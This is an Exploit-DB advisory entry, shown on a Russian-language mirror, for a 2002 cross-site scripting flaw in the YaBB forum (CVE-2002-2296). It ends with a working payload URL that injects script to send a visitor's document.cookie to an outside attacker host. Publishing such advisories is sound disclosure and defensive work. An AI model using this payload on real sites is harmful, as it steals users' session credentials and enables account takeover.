- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 22052
- Проверка EDB
-
- Пройдено
- Автор
- FABRICIO ANGELETTI
- Тип уязвимости
- WEBAPPS
- Платформа
- CGI
- CVE
- cve-2002-2296
- Дата публикации
- 2002-11-28
Код:
source: https://www.securityfocus.com/bid/6272/info
A cross-site scripting vulnerability has been reported in the YaBB forum. This vulnerability is due to insufficient sanitization of URI parameters in some scripts.
As a result, it is possible for a remote attacker to create a malicious link to the login page of a site hosting the web forum. When this link is visited by an unsuspecting web user, the attacker-supplied code will be executed in their browser in the security context of the vulnerable website.
It has been demonstrated that this vulnerability may be exploited to steal cookie-based authentication credentials.
http://www.area51experience.com.ar/foro/YaBB.pl?board=gral;action=display;
num=10360245269<Script>location%3d'Http://url/x.php?Cookie%3d'
%2b(document.cookie)%3b</Script>- Источник
- www.exploit-db.com
